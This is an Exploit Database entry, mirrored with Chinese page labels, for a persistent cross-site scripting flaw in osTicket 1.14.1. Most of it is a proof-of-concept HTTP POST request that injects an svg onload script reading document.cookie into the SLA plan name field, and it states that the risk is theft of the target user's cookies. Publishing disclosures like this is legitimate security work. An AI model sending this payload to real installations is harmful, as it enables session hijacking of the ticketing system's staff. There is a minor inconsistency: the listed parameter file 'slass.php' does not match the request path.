osTicket 1.14.1 – Persistent Authenticated Cross-Site Scripting

• Exploit Database
• 16 阅读

• 作者： Mehmet Kelepçe
  日期： 2020-05-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48413/

• # Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
  # Author: Mehmet Kelepce / Gais Cyber Security
  # Date : 2020-03-24
  # Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
  # Vendor: http://osticket.com
  # Remotely Exploitable: Yes
  # Dynamic Coding Language: PHP
  # CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)
  
  ## this vulnerability was found by examining the source code.
  
  PoC : Ticket SLA Plan Name - HTTP POST REQUEST
  ##########################################################
  POST /upload/scp/slas.php?id=1 HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/upload/scp/slas.php?id=1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 196
  Connection: close
  Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
  Upgrade-Insecure-Requests: 1
  
  submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=
  
  Vulnerable parameter: name
  Parameter file: /scp/slass.php
  
  I used the name of the SLA for any ticket.
  
  ## Risk : cookie information of the target user is obtained.